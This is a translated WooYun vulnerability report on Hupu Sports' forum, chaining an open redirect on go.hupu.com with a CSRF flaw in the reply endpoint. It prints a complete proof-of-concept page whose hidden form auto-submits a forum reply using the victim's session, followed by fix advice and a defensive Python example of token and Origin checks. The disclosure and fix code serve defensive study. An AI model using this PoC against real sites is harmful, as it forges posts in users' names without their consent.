Vulnerability summary

Defect ID: wooyun-2015-0110198

Title: Hupu URL redirect + CSRF can be used to post replies (forum spam) as other users

Vendor: Hupu Sports (虎扑体育网)

Author: 路人甲 (anonymous "Passerby A")

Submitted: 2015-04-27 12:22

Fix time: 2015-04-27 12:45

Published: 2015-04-27 12:45

Vulnerability type: design flaw / logic error

Severity: Low

Self-rated Rank: 1

Status: the vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-04-27: details sent to the vendor, awaiting vendor response
2015-04-27: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Same as the title; I successfully got my roommate to spam-post.

Detailed description:

URL redirect: go.hupu.com/u?url= forwards to any URL given in the parameter.
CSRF: the BBS reply endpoint (bbs.hupu.com/post.php) has no anti-CSRF token and no Referer check, so any page the victim visits while logged in can submit a reply in their name.
Chaining the two, a link such as http://go.hupu.com/u?url=http://x.x.x.x/csrf.html may be more convincing: it begins with a hupu.com host, but lands the victim on the attacker-hosted csrf.html, which auto-submits a reply using the victim's session cookies.

Proof of vulnerability:

<!-- Attacker-hosted csrf.html: a hidden copy of Hupu's quick-reply form, auto-submitted by the script at the bottom. The browser attaches the victim's bbs.hupu.com cookies, so the reply is posted as the victim. -->
<div id="bodyframe" style="VISIBILITY: hidden">
<form id="fastform" name="FORM" class="j_atc_content left" method="post" action="http://bbs.hupu.com/post.php?" onsubmit="textConvert('fastform', 'atc_content')">
<!-- reply box -->
<div id="re" class="box"><div id="re_top"></div>
<div id="re_box">
<div class="left"><a class="headpic" href="http://my.hupu.com/19312932"><img width="45" height="45" src="http://i1.hoopchina.com.cn/user/default_small.jpg"></a><br>&nbsp;<a class="blue" style="" href="http://my.hupu.com/set.php?s=picture">Update avatar</a></div>
<div class="input"><a id="j_face" class="face_button" title="Click to choose an emoticon">&nbsp;</a>
<div class="plate_03" style="position:absolute;top:0;right:5px;font-size:14px;">
<!-- text-link ad slot; the Google ad script and iframe copied from the Hupu page were removed here, they play no part in the CSRF -->
</div>
<div id="face_lable" class="face_img" style="display:none;overflow-y:scroll;"><div id="leftface" class="left"></div></div>
<!-- reply body; filled in by the script below (a value attribute on a textarea is ignored by browsers) -->
<textarea name="atc_content" id="atc_content" rows="8" style="height: 96px;"></textarea>
<div class="fb_pic" id="add_li_vote" style=" margin:-3px 8px 10px 0; display:none;">
<input name="usevote" id="usevote" type="hidden" value="0">
<input name="douid" id="usevote" type="hidden" value="1">
<input name="votetype" type="hidden" value="bbs">
<a href="javascript:;" id="del_vote" class="del" style="float:right">&nbsp;</a><strong>Add poll</strong><br>
<span class="f666">Poll title:</span><input id="votetitle" name="votetitle" class="inputfile" style="border-top:1px solid #444;border-left:1px solid #444;width:400px;" type="text">
<div id="uppic1"><span class="f666">Option 1:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic2"><span class="f666">Option 2:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic3"><span class="f666">Option 3:</span><input name="votename[]" type="text" class="inputfile"><a class="blue" onclick="delvotenoe('3')" href="javascript:;"> X </a></div>
<input name="editnum" type="hidden" id="editnum" value="3">
<input name="nowitnum" type="hidden" id="nowitnum" value="3">
<div id="addvote"></div>
<div class="f444" style="width:425px;"><span class="f666">&nbsp;</span><div id="addvotenum"><a class="blue right" onclick="doadd(1)" href="javascript:;">+ Add an option</a></div><label for="multiplevote"><input id="multiplevote" type="checkbox"> Allow multiple choices</label><span style="display:none;">, up to <input name="voteclass" class="inputtext width60px" size="1" maxlength="2" value=""> choices</span></div>
</div>
<div class="right" style=""><label for="fbd_reply_note"><input name="fbd_reply_note" type="checkbox" value="1" id="fbd_reply_note">Also publish to <a class="blue" href="http://my.hupu.com/19312932/note">my status feed (碎碎念)</a></label></div>
<input name="postfast" type="hidden" value="2">
<input id="fastbtn" class="btns2" type="submit" value="Reply" title="Press Ctrl + Enter to submit the reply">
<span style="margin-left:20px;"><a id="p4" class="blue" href="javascript:;">Add poll</a></span>
<span id="adv_reply" style="margin-left:20px;"><a id="orz" class="blue" href="/post.php?action=reply&amp;fid=1048&amp;tid=12523690&amp;replayofpage=">Advanced reply ?</a></span>
</div>
<div class="clearfix"></div></div>
<div id="re_bottom"></div></div><!-- reply box END -->
<!-- target thread: fid=1048, tid=12523690. atc_title and subject carry the thread's own title (kept verbatim, it is posted data); the "Re:" prefix marks a reply. None of these hidden fields is a per-session token, which is the defect. -->
<input type="hidden" name="atc_title" value="Re:【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" size="65">
<input type="hidden" name="atc_usesign" value="1">
<input type="hidden" name="atc_convert" value="1">
<input type="hidden" name="atc_autourl" value="1">
<input type="hidden" value="2" name="step">
<input type="hidden" value="reply" name="action">
<input type="hidden" value="1048" name="fid">
<input type="hidden" value="12523690" name="tid">
<input type="hidden" value="【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" name="subject">
<input type="hidden" value="0" name="editor">
<input type="hidden" value="none" name="atc_attachment">
<input type="hidden" value="" name="replayofpage">
<input type="hidden" value="1" name="replaymeta">
</form>
</div>
<script>
// Reply body posted as the victim (roughly: "The old man really is tough....")
document.getElementById("atc_content").value="老男人果然硬。。。。";
// form.submit() does not fire the onsubmit handler, so the undefined textConvert() is never called;
// the POST goes to bbs.hupu.com with the victim's cookies and no token the server could check.
document.forms[0].submit();
</script>

Fix:

Add a per-session anti-CSRF token to the reply form and reject posts that lack it.
Check the Referer (and, where the browser sends it, the Origin) header and reject cross-site POSTs.
Restrict the go.hupu.com/u?url= redirect to hupu.com targets so it cannot be used to disguise attacker links.
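The fix amounts to two server-side checks. The following is an added example, not Hupu's code and not part of the report, showing how the reply endpoint could enforce a session-bound anti-CSRF token together with an Origin/Referer allow-list, and how the go.hupu.com/u?url= redirect from the detailed description could be limited to first-party targets. SITE_HOSTS, make_csrf_token, check_reply and safe_redirect_target are hypothetical names; the sample requests are constructed from the PoC's form fields.

```python
"""Added example: server-side CSRF and open-redirect checks for the weaknesses
in this report. Not Hupu's code; all names and the host allow-list are assumed."""
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumed first-party hosts; the real site's host set is not in the report.
SITE_HOSTS = {"bbs.hupu.com", "www.hupu.com", "my.hupu.com", "go.hupu.com"}
SITE_DOMAIN_SUFFIX = ".hupu.com"


def make_csrf_token(server_key: bytes, session_id: str) -> str:
    """Session-bound token: HMAC-SHA256 over the session id with a server-side key.
    Embedded as a hidden field in the real reply form; an attacker's page cannot
    read it across origins, so csrf.html cannot supply it."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(server_key: bytes, session_id: str, submitted) -> bool:
    """Constant-time comparison; a missing or empty token fails."""
    if not submitted:
        return False
    return hmac.compare_digest(make_csrf_token(server_key, session_id), submitted)


def _host_of(url: str):
    """Hostname of a URL (urlsplit lower-cases it), or None if unparsable."""
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None


def first_party_host(host) -> bool:
    return host is not None and (host in SITE_HOSTS or host.endswith(SITE_DOMAIN_SUFFIX))


def origin_allowed(headers: dict) -> bool:
    """Prefer Origin, fall back to Referer, reject when both are absent.
    A page can suppress Referer via referrer policy, but modern browsers attach
    Origin to every cross-site form POST, so the attacker cannot hide it."""
    origin = headers.get("Origin")
    if origin:
        return first_party_host(_host_of(origin))
    referer = headers.get("Referer")
    if referer:
        return first_party_host(_host_of(referer))
    return False


def check_reply(headers: dict, form: dict, server_key: bytes, session_id: str):
    """Decision for one POST to the reply endpoint: (accepted, reason)."""
    if not origin_allowed(headers):
        return False, "origin/referer not first-party"
    if not token_valid(server_key, session_id, form.get("csrf_token")):
        return False, "missing or invalid csrf_token"
    return True, "ok"


def safe_redirect_target(url: str):
    """Return url only if it is an absolute http(s) URL on a first-party host, else None.
    Rejects scheme-relative (//host), javascript:, and userinfo tricks (host@evil)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    return url if first_party_host(parts.hostname) else None


if __name__ == "__main__":
    key = b"server-secret-key"      # constructed
    sid = "victim-session-0001"     # constructed
    # Request as produced by the PoC csrf.html (constructed from its hidden fields)
    poc_headers = {"Origin": "http://x.x.x.x", "Referer": "http://x.x.x.x/csrf.html"}
    poc_form = {"action": "reply", "fid": "1048", "tid": "12523690", "atc_content": "..."}
    print("PoC request:", check_reply(poc_headers, poc_form, key, sid))
    # Legitimate submission from the real reply page carrying the token
    ok_headers = {"Origin": "http://bbs.hupu.com"}
    ok_form = dict(poc_form, csrf_token=make_csrf_token(key, sid))
    print("legit request:", check_reply(ok_headers, ok_form, key, sid))
    print("redirect to PoC page:", safe_redirect_target("http://x.x.x.x/csrf.html"))
```

Run directly, the PoC's request is rejected on the Origin check before the token is even examined, and the redirect to the attacker's page returns None. Checking Referer alone, as the fix above suggests, is weaker than checking Origin first and rejecting requests that carry neither, because an attacker page can suppress Referer with a referrer policy.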

Copyright notice: credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-04-27 12:45

Vendor reply:

Not bad, very attentive.

Latest status:

None

